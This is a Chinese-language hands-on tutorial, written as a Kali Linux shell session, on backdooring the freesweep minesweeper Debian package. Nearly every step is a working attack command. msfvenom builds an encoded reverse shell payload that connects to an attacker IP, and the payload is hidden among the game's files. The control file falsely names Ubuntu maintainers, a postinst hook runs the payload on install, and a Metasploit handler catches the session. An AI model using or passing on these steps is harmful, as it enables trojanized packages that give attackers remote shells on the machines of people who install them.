制作恶意 deb 软件包来触发后门

实战-制作恶意 deb 软件包来触发后门

制作恶意软件包使用--download-only 方式下载软件包不进行安装

root@ kali:~# apt --download-only install freesweep

将软件包移动到 root 目录

root@ kali:~# mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ~/

解压软件包到 free 目录

root@ kali:~# dpkg -x freesweep_1.0.2-1_amd64.deb free

生成恶意代码到软件包源文件中

root@ kali:~ # msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp

LHOST=192.168.185.252 LPORT=4444 -b "\x00" -i 10 -f elf -o

/root/free/usr/games/freesweep_sources

创建软件包信息目录

root@ kali:~# mkdir free/DEBIAN && cd free/DEBIAN

创建软件包的信息文件

root@ kali:~# tee /root/free/DEBIAN/control << 'EOF'

Package: freesweep

Version: 1.0.2-1

Section: Games and Amusement

Priority: optional

Architecture: amd64

Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)

Description: a text-based minesweeper

Freesweep is an implementation of the popular minesweeper game, where

one tries to find all the mines without igniting any, based on hints given

by the computer. Unlike most implementations of this game, Freesweep

works in any visual text display - in Linux console, in an xterm, and in

most text-based terminals currently in use.

EOF

创建 deb 软件包，安装后脚本文件，来加载后门

root@ kali:~# tee /root/free/DEBIAN/postinst << 'EOF'

#!/bin/bash

sudo chmod 2755 /usr/games/freesweep_sources

sudo /usr/games/freesweep_sources &

EOF

给脚本文件添加执行权限

root@ kali:~/free/DEBIAN# chmod 755 /root/free/DEBIAN/postinst

构建新的 deb 安装包

root@ kali:~/free/DEBIAN# dpkg-deb --build /root/free/

dpkg-deb: 正在 '/root/free.deb' 中构建软件包 'freesweep'。

root@ kali:~/free/DEBIAN# ls /root/free.deb

root@ kali:~# msfconsole

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.185.252

msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > run

meterpreter > getuid

卸载软件包

root@ kali:~# dpkg -r freesweep